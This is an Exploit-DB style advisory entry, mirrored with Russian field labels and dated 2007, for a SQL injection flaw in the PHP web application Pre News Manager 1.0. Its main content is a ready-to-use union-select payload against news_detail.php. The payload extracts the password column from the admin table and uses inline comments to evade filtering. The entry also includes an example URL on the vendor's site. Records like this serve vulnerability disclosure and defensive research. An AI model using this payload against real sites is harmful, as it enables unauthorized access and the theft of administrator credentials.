Exploit Pre News Manager 1.0 - SQL Injection

[Exploiter]

EDB-ID

3841

Проверка EDB

1. Пройдено

Автор

MEHMET INCE

Тип уязвимости

WEBAPPS

Платформа

PHP

CVE

cve-2006-2763

Дата публикации

2007-05-03

==============================================

Pre News Manager v1.0 Remote SQL Injection

==============================================

Found: Cyber-Security.org

==============================================

Script site: http://www.preproject.com/news.asp

==============================================

Exploit:
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*

==============================================

Example: http://www.preproject.com/news%20manager/

==============================================

# milw0rm.com [2007-05-03]